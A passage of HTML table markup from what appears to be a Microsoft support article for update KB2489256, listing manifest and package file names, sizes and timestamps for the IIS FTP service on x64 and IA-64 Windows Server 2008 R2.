class=\"sbody-td\">21:26</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_microsoft-windows-iis-ftpsvc_31bf3856ad364e35_6.1.7601.21649_none_a8ff4a7ac571dfa3.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">31,015</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:26</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb2489256_bf~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,206</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb2489256~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,564</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb2489256_bf~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,967</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb2489256~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,078</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb2489256_bf~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,615</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb2489256~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,143</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_4_for_kb2489256_bf~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,137</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_4_for_kb2489256~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,900</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2489256_rtm_bf~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,089</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2489256_rtm~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,130</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2489256_sp1_bf~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,089</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2489256_sp1~31bf3856ad364e35~amd64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,129</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,669</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Wow64_microsoft-windows-iis-ftpsvc_31bf3856ad364e35_6.1.7600.16748_none_b0e2fab1e38f7c91.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">11,616</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">06:30</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Wow64_microsoft-windows-iis-ftpsvc_31bf3856ad364e35_6.1.7600.20888_none_b14157ccfccd8c1f.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">11,616</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">06:14</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Wow64_microsoft-windows-iis-ftpsvc_31bf3856ad364e35_6.1.7601.17550_none_b2b6857be0c539b6.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">11,616</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">06:34</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Wow64_microsoft-windows-iis-ftpsvc_31bf3856ad364e35_6.1.7601.21649_none_b353f4ccf9d2a19e.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">11,616</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">06:14</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div><h4 class=\"sbody-h4\">Additional files for all supported IA-64-based versions of Windows Server 2008 R2</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_02d852a82941a92e77fa3b181cc73f60_31bf3856ad364e35_6.1.7600.20888_none_5560f2f5ffe25482.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,044</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_73332d6d84ab7914a9f6ab45557e39c7_31bf3856ad364e35_6.1.7600.16748_none_5d4e9bca7090d43f.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,044</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_d4cf8a50ca2354ee0f86d58770c4c855_31bf3856ad364e35_6.1.7601.21649_none_202786fd4db74272.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,044</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_ff4eb3aa4c2752a7745e493df59d59ba_31bf3856ad364e35_6.1.7601.17550_none_0012fee45d187efb.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,044</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_microsoft-windows-iis-ftpsvc_31bf3856ad364e35_6.1.7600.16748_none_4a7158d1f6cf525c.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">31,012</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_microsoft-windows-iis-ftpsvc_31bf3856ad364e35_6.1.7600.20888_none_4acfb5ed100d61ea.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">31,012</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_microsoft-windows-iis-ftpsvc_31bf3856ad364e35_6.1.7601.17550_none_4c44e39bf4050f81.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">31,012</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_microsoft-windows-iis-ftpsvc_31bf3856ad364e35_6.1.7601.21649_none_4ce252ed0d127769.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">31,012</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb2489256_bf~31bf3856ad364e35~ia64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,997</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb2489256~31bf3856ad364e35~ia64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,140</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb2489256_bf~31bf3856ad364e35~ia64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,201</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb2489256~31bf3856ad364e35~ia64~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,928</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time 